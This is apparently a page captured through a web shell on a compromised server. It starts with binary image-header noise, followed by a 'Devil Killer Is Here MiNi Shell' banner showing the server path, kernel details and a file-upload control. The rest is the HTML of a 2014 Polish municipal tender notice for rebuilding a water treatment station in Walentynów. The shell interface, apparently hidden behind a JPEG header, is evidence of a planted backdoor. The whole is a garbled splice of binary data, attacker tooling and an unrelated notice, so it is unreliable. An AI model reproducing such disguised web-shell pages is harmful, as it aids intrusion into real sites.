JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140326/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140326/64651-N-2014.html

<p class="kh_header"><b>Jeziorzany: Przebudowa stacji wodociągowej w Walentynowie</b><br>
<b>Numer ogłoszenia: 64651 - 2014; data zamieszczenia: 26.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jeziorzany , ul. Rynek 22, 21-146 Jeziorzany, woj. lubelskie, tel. 81 8578001, faks 81 8578002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.jeziorzany.eu ; www.jeziorzany.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa stacji wodociągowej w Walentynowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa stacji wodociągowej w miejscowości Walentynów, zlokalizowanej na działce gruntu 464.2, 464.1 położonej w miejscowości Walentynów, gm. Jeziorzany.  Stan aktualny W miejscowości Walentynów na nieruchomości oznaczonej jako działka nr 464.2, 464.1 znajduje się budynek stacji uzdatniania wody oraz inne obiekty min, zbiornik wyrównawczy wody pitnej, dwie studnie głębinowe w tym jedna nie uzbrojona. Teren działki jest urządzony i ogrodzony. Budynek hydroforni znajdujący jest w złym stanie technicznym, wymagający remontu min. wymiana poszycia dachowego budynek kryty eternitem, wymiana stolarki, ocieplenia budynku oraz inne prace remontowe. Urządzenia uzdatniania wody oraz zestawy pomp układ napowietrzania, instalacje wodociągowo  kanalizacyjne oraz elektryczne przewidziane są do wymiany zgodnie z wymaganiami określonymi w dokumentacji projektowej oraz niniejszej specyfikacji. Opis przedmiotu zamówienia określa: projekt budowlany z podziałem na branże, przedmiar robót dla poszczególnych branż oraz specyfikacja techniczna wykonania i odbioru robót stanowiące załączniki do SIWZ. Projekt budowlany zakłada wykorzystanie istniejącego ujęcia wody oraz istniejącego układu dystrybucji . Zamówienie obejmuje prace remontowe i budowlane budynku hydroforni, modernizację układu technologicznego uzdatniania wody, podłączenie do istniejących studni głębinowych oraz ich uzbrojenie. Inwestycja zlokalizowanego jest na działce nr. 464.1, 464.2 w Walentynowie. Zakres robót obejmuje branżę budowlaną, branżę technologicznosanitarna, branżę elektryczną. Branża budowlana W zakresie robót budowlanych do wykonania są następujące prace w ramach remontu i modernizacji budynku hydroforni ściany zewnętrzne oczyszczenie ścian, gruntowanie, ocieplenie styropianem, wykonanie nowych obróbek blacharskich, wykonanie tynku gładkiego, malowanie, wewnętrzne ściany naprawa pęknięć, wykonanie glazury, malowanie, montaż i wymian stolarki okien i drzwi, naprawa istniejących posadzek betonowych i układanie płytek ceramicznych antypoślizgowe, wymiana kratek ściekowych do studzienek  na kratki nierdzewne, inne roboty wykończeniowe m.in. wykonanie nowych  rynien i rur spustowych, nowej obróbki blacharskiej przy oknach, wykonanie opaski z kostki brukowej dookoła budynku. Remont pomieszczeń SUW obejmuje m.in. wykonanie powierzchni łatwo zmywalnych poprzez ułożenie na ścianach glazury kolor i format w uzgodnieniu z Zamawiającym. Pozostałe ściany i sufity należy pomalować farbami w kolorze białym, farby powinny być odporne na podwyższoną wilgotność oraz zmywanie.Ponadto należy wykonać wymianę pokrycia dachowego wykonanego z płyt cementowo azbestowych na poszycie wykonane z blacho dachówki. Wykonawca winien w kalkulacji uwzględnić koszty utylizacji istniejącego pokrycia dachowego. Branża elektryczna Projektuje się wymianę instalacji elektrycznych wewnętrznych za licznikowych, ułożenie nowych kabli zasilających do obiektów zewnętrznych oraz wykonanie instalacji elektrycznej regulującej w sposób automatyczny pracę hydroforni.  Urządzenia zasilane i sterowane będą z rozdzielni elektrycznosterowniczej. W szafie zainstalować należy urządzenia zabezpieczające przed skutkami zwarć i przeciążeń oraz odpowiednie urządzenia sterujące. Urządzenia technologiczne poza budynkiem sterowane i zasilane będą przy pomocy linii kablowych ziemnych.  Elementem zarządzającym pracą układu technologicznego będzie przemysłowy sterownik mikroprocesowy PLC współpracujący z urządzeniami pomiarowymi i wykonawczymi. Stacja będzie pracować w trybie automatycznym z możliwością sterowania w trybie ręcznym. Stany pracy i awarii urządzeń sygnalizowane odpowiednimi lampkami w szafie rozdzielczo sterującej. Szafa sterownicza ma zapewnić w pełni automatyczną pracę SUW Parametry zasilania SUW, Układ zasilania TN C S Napięcie zasilania 230.400V AC Moc szczytowa 30 kW, Zabezpieczenie przelicznikowe  63 A  Ujęcie wody  Wykorzystać należy  istniejące studnie głębinowe zlokalizowane na terenie stacji wodociągowej. Zamówienie obejmuje instalację i wymianę w studniach pomp głębinowych na typu GAB5.08 N 2.2kW lub równoważnych, montaż głowic studziennych wraz z uzbrojeniem kontrolnopomiarowym. Obudowę i elementy uzbrojenia studni należy pomalować. Branża technologicznosanitarna Przewiduje się demontaż istniejącego układu technologicznego wewnątrz budynku hydroforni. Przewiduje się jedynie pozostawienie rurociągów wylotowych  dystrybucyjnych do sieci wodociągowej oraz stanowiących połączenie SUW z zbiornikiem wody pitnej. Ze względu na zawartość związków żelaza i mętności w wodzie czerpanej z ujęcia wody, należy zamontować urządzenia zapewniające odpowiednią redukcję związków nie pożądanych  min. Fe , Mn  w wodzie przeznaczonej do spożycia. Zamówienie obejmuje Demontaż wszystkich urządzeń stanowiących wyposażenie tj. hydrofory i pompy płaskie, armaturę wod - kan, orurowanie, sprężarkę oraz innych elementów starej technologii. Dostawę oraz montaż w istniejącym pomieszczeniu technologicznym,  fabrycznie nowych urządzeń do uzdatniania wody  kompletnego zestawu.Wykonanie odpowiednie instalacji technologicznej wraz z elementami automatyki i sterowania.Montaż szafy sterowniczej z możliwością przesyłania danych Online do siedziby zamawiającego. Stacja ma być w pełni zautomatyzowana, obsługiwana za pomocą sterowników mikroprocesorowych i siłowników pneumatycznych.Rurociągi technologiczne stacji wodociągowej należy wykonać ze stali nierdzewnej  zgodnie z normą PN EN 10088 1. Rurociągi wodociągowe, odcinki montażowe przebiegające w wykopach zakryte, przyłączenie króćca wody surowej, podawanej na zbiornik, króćca ssawnego i tłocznego zestawu hydroforowego wykonać z PE , PCV klejonego . Montaż przepływomierza DN80DN100 na rurociągu odpływowym wraz z układem awaryjnego dozowania podchlorynu zestaw automatyczny Stopień zautomatyzowania procesu musi zapewniać możliwość obsługi Stacji Uzdatniania Wody poprzez załogę dochodzącą.Zastosowane rozwiązania techniczne mają być nowoczesne i tanie w eksploatacji, charakteryzujące się wysoką jakością wykonania oraz niską energochłonności. Hydrofornia tymczasowa Projektowana inwestycja ma być tak prowadzona wykonywana, aby uniknąć przerw w dostawie wody a jednocześnie zapewnić niezbędne parametry stacji wodociągowej. Dla swobodnego przeprowadzenia projektowanej rozbudowy stacji wodociągowej. Należy wykonać prowizoryczną hydrofornię na terenie stacji wodociągowej na wolnym powietrzu np. wykorzystując demontowane hydrofory. Po zakończeniu rozbudowy prowizoryczna hydrofornia zostanie zdemontowana.  Instalacje technologiczne i pomocnicze w hydroforni Hydrofornia powinna być zaopatrzona w nowoczesny systemy pomiaru i monitorowania. Do sterownika z jednostką centralną powinien zostać dołączony moduł posiadający wbudowany modem prędkość transmisji co najmniej 14,4 kb.s. Będzie to moduł komunikacyjny współpracujący w systemach automatycznych ze wszystkimi jednostkami centralnymi jako moduł podrzędny. Ma być przystosowany do komunikacji poprzez łącze bezpośrednie, modemowe oraz radiomodemowe, przy wykorzystaniu protokołu komunikacyjnego. W dyspozytorni powinien zostać zainstalowany sterownik oparty na jednostce centralnej, pracujący jako moduł nadrzędny. Ma on współpracować z minimum 16 modułami podrzędnymi. Do komunikacji między sterownikami powinna zostać wykorzystana linia komutowana. Do sterownika znajdującego się w dyspozytorni należy podłączyć stację operatorska. Na komputerze powinien zostać zainstalowany program, w oparciu o który będzie pracować aplikacja wizualizacji pracy instalacji. Program wizualizacji powinien komunikować się ze sterownikiem poprzez serwer komunikacyjny działający również na tym samym komputerze. Aplikacja wizualizacji powinna realizować następujące funkcje Podgląd technologiczny stanu instalacji. W ramach tego system informuje operatora o poziomie wody w zbiorniku wyrównawczym, ilości wody podawanej do sieci i ilości wody uzdatnianej, stanie urządzeń pracujących na obiekcie oraz wystąpieniu stanów awaryjnych.Alarmowanie o występujących stanach awaryjnych. W przypadku wystąpienia przekroczenia jakichkolwiek granic alarmowych system informuje operatora o występującym alarmie  otwarte zostaje okno alarmowe oraz występuje sygnalizacja dźwiękowa.Archiwizowanie danych na dysku lokalnym. Wszystkie dane pobierane z obiektu zapisywane są do lokalnej bazy danych i zachowane na dysku przez 3 miesiące. Okres ten jest definiowany przez programistę, może być dowolnie długi. Zapisywane są również informacje o występujących alarmach, a także ustawienia systemu zadawane przez operatora. W każdej chwili użytkownik może otworzyć tablicę trendów historycznych i przejrzeć zebrane pomiary za każdy wymagany okres. Dodatkowo ma możliwość przeglądania aktualnych pomiarów przedstawionych w postaci graficznych wykresów.Raportowanie. Informacje o pracy urządzeń w obiekcie oraz pobrane dane są drukowane w postaci zestawień tabelarycznych. Okres, za który sporządzany jest raport, może mieć dowolny zakres. Operatorzy mogą również drukować informacje o bieżącym stanie w obiekcie. Zdalna możliwość podglądu instalacji z wykorzystaniem łączy internetowych , telefonicznych.System monitoringu i dozoru  monitoring wizyjny teren SUW powinien obejmować teren przyległy do stacji ogrodzony wraz z wnętrzem budynku stacji poprzez instalację kamer przemysłowych wewnątrz stacji min. sztuk 2, monitoring terenu stacji, kamery zewnętrzne, min. sztuk 3. Montaż instalacji alarmowej wewnątrz budynku  z funkcją zdalnego powiadamiania o stanach alarmowych poprzez moduł GSM.Przedmiot Zamówienia obejmuje także sporządzenie instrukcji eksploatacyjnej instalacji technologicznej SUW wraz z przeszkoleniem personelu obsługi wykonanie badań związanych z osiągnięciem efektu ekologicznego oraz ich monitorowanie w okresie udzielonej gwarancji.Materiały, wyroby, urządzenie.Szczegółowy opis przedmiotu zamówienia stanowią dokumentacja projektowa wraz z przedmiarami robót oraz specyfikacja techniczna wykonania i odbioru robót. Wykonawca winien uwzględnić w wycenie wszystkie elementy zawarte w dokumentacji projektowej, przedmiarach robót i SIWZ. W przypadku jakichkolwiek rozbieżności pomiędzy dokumentacją a dokumentami pomocniczymi(przedmiarami robót a specyfikacją techniczna wykonania i odbioru robót przesądzają zapisy dokumentacji projektowej. Zamawiający dopuszcza składanie ofert równoważnych w zakresie przyjętych rozwiązań technologicznych, użytych materiałów, wyrobów i urządzeń pod warunkiem, że zaproponowane w ofercie są istotnie równoważne z określonymi w dokumentacji technicznej pod względem parametrów technicznych, jakościowych i eksploatacyjnych. W przypadku, gdy w opisie przedmiotu zamówienia technologia robót przy realizacji przedmiotu zamówienia zostaje opisana poprzez wskazanie znaków towarowych lub pochodzenia, Zamawiający informuje, iż zapis ten jest jedynie przykładowym i stanowi wskazanie dla Wykonawcy jakie cechy powinny posiadać materiały użyte do realizacji przedmiotu zamówienia. Zamawiający dopuszcza realizację zamówienia poprzez zastosowanie materiałów równoważnych. Zamawiający przez podanie nazw własnych produktów, określa minimalne parametry techniczne, cechy użytkowe oraz jakościowe m.in. wymiary, skład, zastosowany materiał, kolor, odcień, przeznaczenie urządzeń, estetyka itp. jakim powinny odpowiadać materiały równoważne, aby spełniały stawiane wymagania. Zgodnie z art. 30 ust. 5 ustawy - Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez Zamawiającego.Zamawiający opisując przedmiot zamówienia przy pomocy określonych norm, aprobat czy specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1 3 ustawy, zgodnie z art. 30 ust. 4 ustawy dopuszcza rozwiązania równoważne opisywanym. Wykonawca może, przy pomocy innych dokumentów wykazać, że oferowane przez niego produkty spełniają wymogi wynikające ze wskazanych norm lub odpowiednich specyfikacji technicznych.Zastosowane do wbudowania materiały, dostarczone wyroby i urządzenia winny posiadać wszelkie wymagane prawem dopuszczenia do obrotu i stosowania w budownictwie atesty, certyfikaty, aprobaty techniczne, świadectwa badań i kontroli jakości.  Pomieszczenia magazynowe, socjalne.
Zamawiający nie dysponuje pomieszczeniami magazynowymi oraz socjalnymi dla pracowników Wykonawcy  konieczne jest zorganizowanie odpowiedniego zaplecza budowy w ramach oferty. Plac budowy Wykonawca zobowiązuje się do właściwej organizacji placu budowy, zabezpieczenia rejonu wykonywanych prac oraz do prowadzenia robót w sposób nie zagrażający bezpieczeństwu zatrudnionych pracowników i użytkowników, zgodnie z obowiązującymi przepisami bhp i ppoż., oraz opracowania i bieżącego aktualizowania z inspektorem nadzoru zamawiającego postępu realizacji robót.  Gwarancja Wykonawca winien udzielić gwarancji bez ograniczeń jej zakresu na wszelkie roboty objęte umową na okres 36 miesięcy licząc od dnia podpisania przez strony protokołu odbioru końcowego. W ramach gwarancji Wykonawca zobowiązany będzie do utrzymania w pełnej sprawności technicznej przedmiotu umowy, bezpłatnego świadczenia usług obejmujących usuwanie usterek i wszelkich nieprawidłowości oraz bezpłatnego przeprowadzania konserwacji i przeglądów technicznych.  Stacja Uzdatniania Wody musi spełniać wymagania określone następującymi przepisami Ustawą Prawo Ochrony Środowiska Dz. U. Nr 62.2001 poz. 627 Ustawą Prawo Wodne Dz. U. Nr 115.2001 poz. 1229Ustawą o zbiorowym zaopatrzeniu w wodę i zbiorowym odprowadzeniu ścieków  DzU nr. 238.2002  poz. 2022 z pozniejszymi zmianami Wykonawca jest jedynym odpowiedzialnym za ostateczny efekt ekologiczny, którego osiągniecie w okreslonych parametrach decyduje o rozliczeniu niniejszego zadania. Roboty należy wykonywać siłami własnymi lub w systemie generalnego wykonawstwa, zgodnie z opracowaną dokumentacją zgłoszeniową, specyfikacją techniczną wykonania i odbioru robót, obowiązującymi normami, polskim Prawem Budowlanym wraz z aktami wykonawczymi i innymi przepisami w zakresie dotyczącym przedmiotu zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje  udzielnie zamówień dodatkowych i uzupełniających zgodnie z art. 64 UZP</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.42.00.00-7, 45.30.00.00-0, 45.21.00.00-2, 45.32.00.00-6, 45.31.00.00-3, 45.26.10.00-4, 45.26.25.00-6, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości 15 000 zł (słownie: piętnaście tysięcy złotych). Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia  14.04.2014., do godz. 10.00
2.	Wadium może być wniesione formach wskazanych w art. 45 ust. 6 ustawy prawo zamówień publicznych. Dokument w formie poręczenia lub gwarancji musi zawierać zobowiązanie zgodnie z art. 46 ust. 5 ustawy prawo zamówień publicznych.
3.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto 34 8721 0008  0000 0648 2000 0040 
4.	Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w oryginale w dniu przetargu w kasie Zamawiającego.
5.	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji musi wynikać bezwarunkowe, na każde pisemne zadanie zgłoszone przez Zamawiającego w terminie związania oferta zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
6.	Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania.
7.	Zamawiający (zgodnie z art. 46 ust.1 ustawy PZP) zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Ustawy PZP.
8.	 Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy z sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy (jeżeli takiego zabezpieczenia żądano).
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach       określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, 
10.	Zamawiający zatrzyma również wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
11.	Pozostałe przypadki zwrotu lub zatrzymania wadium zawarto w art. 46 ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia o spełnieniu 
warunku posiadania uprawnień do wykonywania określonej działalności  lub czynności , jeśli 
przepisy prawa nakładają obowiązek ich posiadania zgodnie z wzorem (załącznik nr 2 do SIWZ )</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu  dokonywania oceny tego warunku 
 Warunek tez zostanie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich pięciu lat przed
upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym
okresie wykonał w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończy
ukończył co najmniej dwie roboty budowlane związane z budową, rozbudową lub modernizacją 
dotyczące stacji uzdatniania wody w tym jedną o wartości inwestycji, co najmniej 500 tys. zł netto
W przypadku jeżeli wykonane roboty były rozliczane w walucie obcej, należy podać ich wartość w złotych polskich stosując przeliczenie według średniego kursu Narodowego Banku Polskiego z dnia zamieszczenia ogłoszenia o zamówieniu.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek ten powinien spełnić co najmniej jeden z Wykonawców lub wszyscy Wykonawcy wspólnie.
Wykonawcy zgodnie z art. 26 ust. 2b pzp mogą wykazać spełnienie warunku polegając na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji wykonawca będzie zobowiązany udowodnić Zamawiającemu, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając zobowiązanie do oddania do dyspozycji prawa korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie

Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia zgodnie z wzorem (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny tego warunku. 

Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia  tj. do kierowania robotami:
a)	 Co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,
b)	 Co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych 
c)	Co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.

Uprawnienia wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane ( tj. DzU z 2010 r. Nr 243, poz. 1623 z zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie ( DzU z 2006 r. Nr 83, poz. 578 z zm.), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniejszych obowiązujących przepisów. Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im uprawnienia budowlane wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U. z 2008 r, Nr 63, poz. 394).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek ten powinien spełnić co najmniej jeden z Wykonawców lub wszyscy Wykonawcy wspólnie. 
Wykonawcy zgodnie z art. 26 ust. 2b pzp mogą wykazać spełnienie warunku polegając na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji wykonawca będzie zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
